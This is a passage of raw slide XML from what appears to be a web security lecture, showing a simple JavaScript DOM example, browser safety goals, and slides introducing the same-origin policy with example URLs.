              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B3C40"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFBFC"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="708090"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// create a couple of elements in an otherwise empty HTML page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> heading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="A67F59"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>"h1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> heading_text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="A67F59"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>"Big Head!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>         heading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>heading_text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>         document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B3C40"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>heading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFBFC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFBFC"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="15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7"/>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Goal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="734500"/>
            <a:ext cx="62493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Safe to visit an evil web site:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The website cannot access (read/write/execute) other resources/data on the computer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Safe to visit two different pages at the same time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The websites cannot access each other data arbitrarily</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Safe delegation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The websites cannot access each other data arbitrarily </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="Google Shape;166;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960775" y="1397050"/>
            <a:ext cx="1390650" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167" name="Google Shape;167;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6284500" y="2618875"/>
            <a:ext cx="2743200" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062950" y="3761950"/>
            <a:ext cx="1390650" cy="87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8"/>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Issues and Principles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p38"/>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A web page (document) contains contents and multiple pages from different sources.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. an image from ads.com, analytics from google.com, query js from rdn.foo.com, inline js from FB, f.jpg from FB etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>iframe in HTML5 is used to display a web page within a web page. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Goal: isolation and correct access control to data and other resource</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Principle: same origin principle</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Each frame has an origin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It can only access its own origin, and cannot access data associated with a different origin unless both explicitly opt in.</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9"/>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Origin Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p39"/>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Origin is defined by: scheme, host (port)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.a.com/index.html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.a.com/index.html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://a.com/index.html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.a.com:8080/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Each origin has its client side resources:</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
